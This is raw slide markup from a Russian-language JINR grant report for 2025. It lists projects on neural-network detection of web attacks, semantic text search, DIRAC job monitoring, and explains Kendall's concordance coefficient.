              <a:t>– System for planning and logging excursions at JINR. – Alushta, Russia. – JINR. – 2022. – Устный доклад.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989D48-EE90-42D9-BF09-308D785BF1C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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AAA7FF-EA5C-4B24-8FC5-DF3A1C2C890F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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38413B-A693-4F0C-A917-E29006B5BA9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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7F4F91-5F0E-4C3E-8957-D6DCDAC20E6A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35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110520" y="3488040"/>
            <a:ext cx="119685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000" b="1" u="none" strike="noStrik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alibri Light"/>
              </a:rPr>
              <a:t>Спасибо за внимание!</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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67" name="Группа 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="407160" y="546120"/>
            <a:ext cx="11375280" cy="2880720"/>
            <a:chOff x="407160" y="546120"/>
            <a:chExt cx="11375280" cy="2880720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="468" name="Рисунок 10"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3251520" y="605160"/>
              <a:ext cx="2842200" cy="28216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69" name="Рисунок 10"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6095880" y="605160"/>
              <a:ext cx="2842200" cy="28216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70" name="Рисунок 10"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="407160" y="546120"/>
              <a:ext cx="2842200" cy="28216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71" name="Рисунок 10"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8940240" y="605160"/>
              <a:ext cx="2842200" cy="28216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6" name="Дата 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9A6C92-7292-485C-9B02-99B8BE7E8825}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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0801872F-709C-416D-B10E-ABF7138C739A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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C226374-EE9B-4C97-A7BF-F7D15B3A0FB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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7F4F91-5F0E-4C3E-8957-D6DCDAC20E6A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36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110520" y="3173760"/>
            <a:ext cx="119685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000" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Дополнительные слайды</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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785362A5-5D91-4B68-BD05-42B314BC117E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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C86DA1F-BD0E-4444-B31F-F34F5BD3C547}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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BCE59A9C-C2BF-4CA8-A248-168FC2830975}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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7F4F91-5F0E-4C3E-8957-D6DCDAC20E6A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37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Прямая соединительная линия 474"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7865640" y="566280"/>
            <a:ext cx="360" cy="5644440"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="126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480" tIns="33480" rIns="78480" bIns="3348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6" name="PlaceHolder 24"/>
          <p:cNvSpPr/>
          <p:nvPr/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77" name="Рисунок 476"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2236680" y="3105360"/>
            <a:ext cx="5563080" cy="3126960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="36000">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="478" name="Рисунок 477"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7908480" y="660600"/>
            <a:ext cx="4077360" cy="5452920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="36000">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="479" name="Рисунок 478"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="6469" t="8172" r="8666" b="5869"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="64440" y="655920"/>
            <a:ext cx="3737520" cy="2523240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="36000">
            <a:noFill/>
          </a:ln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F7479B2F-83D4-4337-BFB7-36B40EC1A749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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FF52A88-4F2C-41A2-BE46-D191EF7C4943}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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44A480-6B94-488B-89B9-866D9FF2A147}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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350C8F-A2C1-42B3-A53C-4E45246C95A5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38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Рисунок 489"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-3960"/>
            <a:ext cx="12189600" cy="6854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1" name="Рисунок 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11059560" y="6293160"/>
            <a:ext cx="912240" cy="167760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="00B050"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Дата 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4155DA1-5A62-438D-97ED-E21C4912F05D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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03.12.2025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AC5AA2A-E929-4D53-A3B7-547CCC7A7B8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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Ильина А. В. Отчет о выполнении работ, финансируемых грантом молодых ученых и специалистов ОИЯИ за 2025 год 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3335BA9-ED51-4C35-A67C-3853AE1B7B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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150150-7BA8-47C6-86D6-04EF155535E7}" type="slidenum">
              <a:rPr lang="ru-RU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39</a:t>
            </a:fld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/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107640" y="666360"/>
            <a:ext cx="11806200" cy="5508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lnSpcReduction="9999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eriod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+mn-lt"/>
              </a:rPr>
              <a:t> Разработка и тестирование нейронной сети для обнаружения сетевых атак к веб-сервисам ОИЯИ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eriod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+mn-lt"/>
              </a:rPr>
              <a:t> Исследование методов агрегации векторных представлений текстов различных семантических пространств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eriod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+mn-lt"/>
              </a:rPr>
              <a:t> Работа над созданием алгоритма семантического поиска информации в базе данных цифровой карты компетенций по детекторным и ускорительным технологиям ОИЯИ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eriod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+mn-lt"/>
              </a:rPr>
              <a:t> Развитие веб-сервиса мониторинга производительности задач на ресурсах, интегрированных в распределенную инфраструктуру DIRAC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="PlaceHolder 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="36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90000"/>
              </a:lnSpc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Выполненные работы за 2025 год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61D5060A-9A24-4111-879C-B9EA6E8F1A6D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34BCA5B-3E9F-4792-B104-3C7171D82BB1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7FAD77CA-563D-4747-86EC-F1587CB7454E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4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5"/>
          <p:cNvSpPr/>
          <p:nvPr/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4" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="-560520" y="1687320"/>
            <a:ext cx="1707120" cy="58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080" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Semantic similarity between PC titles and the " Responsibilities" field</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="10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5" name="TextBox 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="-499680" y="3399840"/>
            <a:ext cx="1749960" cy="74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080" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Semantic similarity between the PC achievement indicators and the "Responsibilities" field</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="10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86" name="Рисунок 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1382400" y="2869560"/>
            <a:ext cx="1977840" cy="1971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7" name="Рисунок 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3401640" y="888840"/>
            <a:ext cx="1949760" cy="197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8" name="Рисунок 12"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3448440" y="2897280"/>
            <a:ext cx="1862640" cy="1943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9" name="Рисунок 14"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5528160" y="896760"/>
            <a:ext cx="2075040" cy="200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0" name="Рисунок 16"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5564880" y="2790000"/>
            <a:ext cx="2025000" cy="2007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1" name="Рисунок 21"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2586960" y="3850560"/>
            <a:ext cx="1017000" cy="938160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:solidFill>
              <a:srgbClr val="710C6C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="492" name="Рисунок 23"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4585680" y="1811880"/>
            <a:ext cx="1128240" cy="975960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:solidFill>
              <a:srgbClr val="085A95"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="493" name="Рисунок 25"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4679640" y="3880080"/>
            <a:ext cx="1074240" cy="916920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:solidFill>
              <a:srgbClr val="9D0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="494" name="Рисунок 27"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6759000" y="1876320"/>
            <a:ext cx="1134000" cy="1000080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:solidFill>
              <a:srgbClr val="6C0169"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="495" name="Рисунок 29"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6731280" y="3913200"/>
            <a:ext cx="1135080" cy="883800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:solidFill>
              <a:srgbClr val="034F7C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="496" name="Рисунок 8"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1302120" y="888120"/>
            <a:ext cx="2125080" cy="200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7" name="Прямоугольник 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1639800" y="868680"/>
            <a:ext cx="1339200" cy="28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60" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Model1</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="126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8" name="Прямоугольник 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3639960" y="887400"/>
            <a:ext cx="1390680" cy="28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60" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Model2</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="126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9" name="Прямоугольник 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5813640" y="864000"/>
            <a:ext cx="1479600" cy="28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60" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Model3</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="126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0" name="Блок-схема: узел 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1394640" y="1322640"/>
            <a:ext cx="304920" cy="225720"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnector">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="065F26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DejaVu Sans"/>
              </a:rPr>
              <a:t>1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1" name="Блок-схема: узел 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3639960" y="1304280"/>
            <a:ext cx="305280" cy="225720"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnector">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="025A97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DejaVu Sans"/>
              </a:rPr>
              <a:t>2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2" name="Блок-схема: узел 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5654880" y="1310040"/>
            <a:ext cx="305280" cy="225720"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnector">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="680067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DejaVu Sans"/>
              </a:rPr>
              <a:t>3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3" name="Блок-схема: узел 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1390320" y="3265200"/>
            <a:ext cx="305280" cy="225720"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnector">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="750D6D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DejaVu Sans"/>
              </a:rPr>
              <a:t>4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4" name="Блок-схема: узел 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3639960" y="3244680"/>
            <a:ext cx="305280" cy="225720"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnector">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="A50000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DejaVu Sans"/>
              </a:rPr>
              <a:t>5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5" name="Блок-схема: узел 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5766120" y="3252600"/>
            <a:ext cx="305280" cy="225720"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnector">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="034E7A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DejaVu Sans"/>
              </a:rPr>
              <a:t>6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06" name="Рисунок 19"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2641320" y="1861560"/>
            <a:ext cx="942840" cy="918000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:solidFill>
              <a:srgbClr val="70AD47"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="507" name="Picture 14" descr="Picture background"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14"/>
          <a:srcRect t="47101"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8028000" y="948960"/>
            <a:ext cx="4015080" cy="1585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8" name="Рисунок 65"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8084880" y="3678480"/>
            <a:ext cx="4107240" cy="24750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09" name="Группа 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="106920" y="629280"/>
            <a:ext cx="1622880" cy="231480"/>
            <a:chOff x="106920" y="629280"/>
            <a:chExt cx="1622880" cy="231480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="510" name="Picture 1" descr="Picture background"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId16"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="106920" y="629280"/>
              <a:ext cx="732600" cy="2314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11" name="Picture 2" descr="6th International Workshop on Deep Learning in Computational Physics (DLCP-2022)"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId17"/>
            <a:srcRect l="15339" t="71308" r="15230"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="840600" y="629280"/>
              <a:ext cx="889200" cy="2314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7" name="Дата 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E7D8B09-CC48-41C1-A6BF-642E271C8D04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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379BA1-AD2D-456E-B039-4C86C511187E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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0DEFBDB-B50E-46E7-803C-AB6C0A750F8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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350C8F-A2C1-42B3-A53C-4E45246C95A5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40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7"/>
          <p:cNvSpPr/>
          <p:nvPr/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3" name="Рисунок 74"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="236880" y="1257840"/>
            <a:ext cx="4521960" cy="4342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4" name="Рисунок 73"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903200" y="758880"/>
            <a:ext cx="7197120" cy="5340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3E32132E-733C-4FDA-8F3C-2B6E621383B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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787B67-A4F5-47C0-B7A1-0935A3CD9ED4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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8FEC4D-DD4E-4878-A9BA-9FCB458A0DB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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350C8F-A2C1-42B3-A53C-4E45246C95A5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41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5FDCD-6362-4E20-888A-B1A3BA980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Пример расчета коэффициента </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>конкордации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Кендалла</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3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DFE5B2B3-EE19-4F52-8EFF-CCD09929F4B2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noGrp="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:ph type="body"/>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="141290" y="613676"/>
                <a:ext cx="5151686" cy="563064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ru-RU" sz="1600" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t>К</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ru-RU" sz="1600" b="1" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t>оэффициент </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ru-RU" sz="1600" b="1" i="0" dirty="0" err="1">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t>конкордации</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ru-RU" sz="1600" b="1" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ru-RU" sz="1600" b="1" i="0" dirty="0" err="1">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t>Кендалла</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ru-RU" sz="1600" b="1" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ru-RU" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t>– статистическая мера того, насколько несколько наборов рангов (оценок, упорядочений) согласованы между собой.</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="just">
                  <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:buChar char="•"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="ru-RU" sz="1600" b="0" i="0" u="sng" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t>Значение </a:t>
                </a:r>
                <a14:m>
                  <m:oMath xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math">
                    <m:r>
                      <a:rPr lang="ru-RU" sz="1600" b="0" i="1" u="sng" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="1D1D2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ru-RU" sz="1600" b="0" i="0" u="sng" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t> = 0 — полное несогласие</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ru-RU" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t> (ранги случайны).</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="just">
                  <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:buChar char="•"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="ru-RU" sz="1600" b="0" i="0" u="sng" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:effectLst/>
